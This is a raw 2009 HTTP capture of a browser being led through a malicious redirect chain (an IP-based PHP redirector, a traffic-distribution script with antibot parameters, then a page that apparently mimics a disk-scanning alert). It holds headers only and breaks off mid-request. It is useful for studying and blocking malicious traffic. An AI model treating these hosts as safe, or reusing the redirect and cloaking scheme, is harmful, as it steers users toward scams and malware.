Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 12 Aug 2009 14:01:34 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: http://207.226.184.198/kkk.php?data=YlZ6kCc81cb2YNNzFp9%2F2Hj6kNZ6IHz1kbk3aJX4EuAb%2FoFe6J%2BK%2Bf3Sc5wSHFlqIoCxV04QKRiESX%2Bv5I%2FICloMTZCLouIYp845ajiqwgY%2BTdfUg0ovCJ6xvUli2I2S2Z1mjPqDb8FoBVRDQv%2ByDTJ8EKVi6YJ12%2Ff7JzDQoy4xLwoLIcYqjgE7TLB5kb0qXJu1775b5m8Sy9rE%2BdrYnIG33hUVAR7Yvijw3IaYuNraezY%2FLCQDBat3nYbpQBGktgNHuGcMyRui8kz6hCjwmBquxNoMfIWcv7baa6cHJuH%2Boc2yLZ1UN1me0ZcsoGBERZGs%2BG0e9FSzRR%2FawEIZc%2BZgk%2FoHaXIRrZMDevyQLxI47RyMr8fQA7QCsPAkKtUEKHX3bMLCX8miQ87BJkDhRD8qTs2%2FOZ0mYZsYrlHkhEvWdAMJzTrQvAeDmzFP%2BSbI7pQicghdw8IlNUyltoHPcoy3F0HuWJcETrDTao0IGkS3qCE7lzI%2F2xysfRdwYbhjv6gZOYQdzmM%3D
Content-Length: 0
Connection: close
Content-Type: text/html

------------------------------------------------------------------
GET /kkk.php?data=YlZ6kCc81cb2YNNzFp9%2F2Hj6kNZ6IHz1kbk3aJX4EuAb%2FoFe6J%2BK%2Bf3Sc5wSHFlqIoCxV04QKRiESX%2Bv5I%2FICloMTZCLouIYp845ajiqwgY%2BTdfUg0ovCJ6xvUli2I2S2Z1mjPqDb8FoBVRDQv%2ByDTJ8EKVi6YJ12%2Ff7JzDQoy4xLwoLIcYqjgE7TLB5kb0qXJu1775b5m8Sy9rE%2BdrYnIG33hUVAR7Yvijw3IaYuNraezY%2FLCQDBat3nYbpQBGktgNHuGcMyRui8kz6hCjwmBquxNoMfIWcv7baa6cHJuH%2Boc2yLZ1UN1me0ZcsoGBERZGs%2BG0e9FSzRR%2FawEIZc%2BZgk%2FoHaXIRrZMDevyQLxI47RyMr8fQA7QCsPAkKtUEKHX3bMLCX8miQ87BJkDhRD8qTs2%2FOZ0mYZsYrlHkhEvWdAMJzTrQvAeDmzFP%2BSbI7pQicghdw8IlNUyltoHPcoy3F0HuWJcETrDTao0IGkS3qCE7lzI%2F2xysfRdwYbhjv6gZOYQdzmM%3D HTTP/1.1
Accept: */*
Referer: http://triwoperl.com/feed/search.php?q=hphosts&aff=19362&saff=200
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Cookie: g-=1
Connection: Keep-Alive
Host: 207.226.184.198

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 14:01:34 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a PHP/4.4.6 mod_perl/1.29 FrontPage/5.0.2.2510
X-Powered-By: PHP/4.4.6
Set-Cookie: g-=1; expires=Thu, 13 Aug 2009 14:01:34 GMT
Set-Cookie: b-=1; expires=Tue, 11 Aug 2009 14:01:34 GMT
Location: http://207.226.184.198/kkk.php?data=YlZ6kCc81cb2YNNzFp9%2F2Hj6kNZ6IHz1kbk3aJX4EuAb%2FoFe6J%2BK%2Bf3Sc5wSHFlqIoCxV04QKRiESX%2Bv5I%2FICloMTZCLouIYp845ajiqwgY%2BTdfUg0ovCJ6xvUli2I2S2Z1mjPqDb8FoBVRDQv%2ByDTJ8EKVi6YJ12%2Ff7JzDQoy4xLwoLIcYqjgE7TLB5kb0qXJu1775b5m8Sy9rE%2BdrYnIG33hUVAR7Yvijw3IaYuNraezY%2FLCQDBat3nYbpQBGktgNHuGcMyRui8kz6hCjwmBquxNoMfIWcv7baa6cHJuH%2Boc2yLZ1UN1me0ZcsoGBERZGs%2BG0e9FSzRR%2FawEIZc%2BZgk%2FoHaXIRrZMDevyQLxI47RyMr8fQA7QCsPAkKtUEKHX3bMLCX8miQ87BJkDhRD8qTs2%2FOZ0mYZsYrlHkhEvWdAMJzTrQvAeDmzFP%2BSbI7pQicghdw8IlNUyltoHPcoy3F0HuWJcETrDTao0IGkS3qCE7lzI%2F2xysfRdwYbhjv6gZOYQdzmM%3D&data2=&an=1&f=1&ch=0
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

------------------------------------------------------------------
GET /kkk.php?data=YlZ6kCc81cb2YNNzFp9%2F2Hj6kNZ6IHz1kbk3aJX4EuAb%2FoFe6J%2BK%2Bf3Sc5wSHFlqIoCxV04QKRiESX%2Bv5I%2FICloMTZCLouIYp845ajiqwgY%2BTdfUg0ovCJ6xvUli2I2S2Z1mjPqDb8FoBVRDQv%2ByDTJ8EKVi6YJ12%2Ff7JzDQoy4xLwoLIcYqjgE7TLB5kb0qXJu1775b5m8Sy9rE%2BdrYnIG33hUVAR7Yvijw3IaYuNraezY%2FLCQDBat3nYbpQBGktgNHuGcMyRui8kz6hCjwmBquxNoMfIWcv7baa6cHJuH%2Boc2yLZ1UN1me0ZcsoGBERZGs%2BG0e9FSzRR%2FawEIZc%2BZgk%2FoHaXIRrZMDevyQLxI47RyMr8fQA7QCsPAkKtUEKHX3bMLCX8miQ87BJkDhRD8qTs2%2FOZ0mYZsYrlHkhEvWdAMJzTrQvAeDmzFP%2BSbI7pQicghdw8IlNUyltoHPcoy3F0HuWJcETrDTao0IGkS3qCE7lzI%2F2xysfRdwYbhjv6gZOYQdzmM%3D&data2=&an=1&f=1&ch=0 HTTP/1.1
Accept: */*
Referer: http://triwoperl.com/feed/search.php?q=hphosts&aff=19362&saff=200
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Cookie: g-=1
Connection: Keep-Alive
Host: 207.226.184.198

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 14:01:35 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a PHP/4.4.6 mod_perl/1.29 FrontPage/5.0.2.2510
X-Powered-By: PHP/4.4.6
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 12 Aug 2009 14:01:35 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: http://amgokz.net/in.cgi?16&parameter=hphosts&ur=1&HTTP_REFERER=19362
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

------------------------------------------------------------------
GET /in.cgi?16&parameter=hphosts&ur=1&HTTP_REFERER=19362 HTTP/1.1
Accept: */*
Referer: http://triwoperl.com/feed/search.php?q=hphosts&aff=19362&saff=200
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Connection: Keep-Alive
Host: amgokz.net
Cookie: SL_16_0000=_2_; SL_20_0000=_17_

HTTP/1.1 200 OK
Date: Wed, 12 Aug 2009 12:02:20 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 923
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

------------------------------------------------------------------
GET /in.cgi?16&ab_iframe=0&ab_badtraffic=0&antibot_hash=776170951&ur=1&HTTP_REFERER=19362&parameter=hphosts&ur=1&HTTP_REFERER=19362 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Connection: Keep-Alive
Host: amgokz.net
Cookie: SL_16_0000=_2_; SL_20_0000=_17_

HTTP/1.1 200 OK
Date: Wed, 12 Aug 2009 12:02:20 GMT
Server: Apache/2
Set-Cookie: SL_16_0000=_2_; domain=amgokz.net; path=/; expires=Thu, 13-Aug-2009 12:02:20 GMT
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 315
Keep-Alive: timeout=1, max=99
Connection: Keep-Alive
Content-Type: text/html

------------------------------------------------------------------
GET /Upload/index.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://amgokz.net/in.cgi?16&ab_iframe=0&ab_badtraffic=0&antibot_hash=776170951&ur=1&HTTP_REFERER=19362&parameter=hphosts&ur=1&HTTP_REFERER=19362
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: morde.info
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 21:44:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.8
Set-Cookie: PREFIXvisited=27; expires=Mon, 17-Aug-2009 01:44:16 GMT
Location:
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251
Content-Language: ru

------------------------------------------------------------------
GET /in.cgi?20&parameter=bank+online4&ur=1&HTTP_REFERER= HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://amgokz.net/in.cgi?16&ab_iframe=0&ab_badtraffic=0&antibot_hash=776170951&ur=1&HTTP_REFERER=19362&parameter=hphosts&ur=1&HTTP_REFERER=19362
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: amgokz.net
Connection: Keep-Alive
Cookie: SL_16_0000=_2_; SL_20_0000=_17_

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 12:02:21 GMT
Server: Apache/2
Set-Cookie: SL_20_0000=_17_; domain=amgokz.net; path=/; expires=Thu, 13-Aug-2009 12:02:21 GMT
Location: http://tlupdate.info/hitin.php?land=20&affid=02909
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 172
Keep-Alive: timeout=1, max=98
Connection: Keep-Alive
Content-Type: text/html

------------------------------------------------------------------
GET /hitin.php?land=20&affid=02909 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://amgokz.net/in.cgi?16&ab_iframe=0&ab_badtraffic=0&antibot_hash=776170951&ur=1&HTTP_REFERER=19362&parameter=hphosts&ur=1&HTTP_REFERER=19362
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 15:01:11 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
X-Powered-By: PHP/5.2.10
location: index.php?affid=02909
Content-Length: 0
Keep-Alive: timeout=20, max=120
Connection: Keep-Alive
Content-Type: text/html

------------------------------------------------------------------
GET /index.php?affid=02909 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://amgokz.net/in.cgi?16&ab_iframe=0&ab_badtraffic=0&antibot_hash=776170951&ur=1&HTTP_REFERER=19362&parameter=hphosts&ur=1&HTTP_REFERER=19362
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Wed, 12 Aug 2009 15:01:11 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
X-Powered-By: PHP/5.2.10
Keep-Alive: timeout=20, max=119
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

------------------------------------------------------------------
GET /Upload/ HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://amgokz.net/in.cgi?16&ab_iframe=0&ab_badtraffic=0&antibot_hash=776170951&ur=1&HTTP_REFERER=19362&parameter=hphosts&ur=1&HTTP_REFERER=19362
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: morde.info
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 21:44:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.8
Set-Cookie: PREFIXvisited=30; expires=Mon, 17-Aug-2009 01:44:17 GMT
Location:
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=1, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251
Content-Language: ru

------------------------------------------------------------------
GET /js/jquery.js HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "8996-d9c2-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:12 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=118
ETag: "8996-d9c2-45c848abe2c00"

------------------------------------------------------------------
GET /js/jquery-init.js HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "8995-292-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:12 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=120
ETag: "8995-292-45c848abe2c00"

------------------------------------------------------------------
GET /Upload/ HTTP/1.1
Accept: */*
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Connection: Keep-Alive
Host: morde.info

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 21:44:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.8
Set-Cookie: PREFIXvisited=2; expires=Mon, 17-Aug-2009 01:44:18 GMT
Location:
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251
Content-Language: ru

------------------------------------------------------------------
GET /js/flist.js HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Sat, 13 Jun 2009 10:00:00 GMT
If-None-Match: "8994-8017-46c37e3576800"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:13 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=117
ETag: "8994-8017-46c37e3576800"

------------------------------------------------------------------
GET /images/alert.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8978-3e0a-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:13 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=119
ETag: "8978-3e0a-45c84872aa500"

------------------------------------------------------------------
GET /images/page_progressbar.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "8988-243-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:14 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=116
ETag: "8988-243-45c848abe2c00"

------------------------------------------------------------------
GET /images/i5000000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8984-421-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:14 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=118
ETag: "8984-421-45c84872aa500"

------------------------------------------------------------------
GET /images/i7000000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "8986-41e-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:15 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=115
ETag: "8986-41e-45c848abe2c00"

------------------------------------------------------------------
GET /images/i1000000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8980-42f-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:15 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=117
ETag: "8980-42f-45c84872aa500"

------------------------------------------------------------------
GET /images/box_top_.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8979-5c9-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:15 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=114
ETag: "8979-5c9-45c84872aa500"

------------------------------------------------------------------
GET /images/i3000000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8982-418-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:15 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=116
ETag: "8982-418-45c84872aa500"

------------------------------------------------------------------
GET /images/i4000000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8983-41f-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:16 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=113
ETag: "8983-41f-45c84872aa500"

------------------------------------------------------------------
GET /images/inf20000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "8987-1a1-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:16 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=115
ETag: "8987-1a1-45c848abe2c00"

------------------------------------------------------------------
GET /images/hdd.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "897e-77c-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:16 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=112
ETag: "897e-77c-45c84872aa500"

------------------------------------------------------------------
GET /images/dvd.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "897c-78e-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:16 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=114
ETag: "897c-78e-45c84872aa500"

------------------------------------------------------------------
GET /images/window1.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "898d-32b3-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:17 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=111
ETag: "898d-32b3-45c848abe2c00"

------------------------------------------------------------------
GET /images/hrline.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "897f-316-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:17 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=113
ETag: "897f-316-45c84872aa500"

------------------------------------------------------------------
GET /images/progressbar.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "8989-160-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:17 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=110
ETag: "8989-160-45c848abe2c00"

------------------------------------------------------------------
GET /images/i6000000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8985-43e-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:17 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=112
ETag: "8985-43e-45c84872aa500"

------------------------------------------------------------------
GET /images/folder.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "897d-560-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:18 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=109
ETag: "897d-560-45c84872aa500"

------------------------------------------------------------------
GET /images/qicon.gif HTTP/1.1
Accept: */*
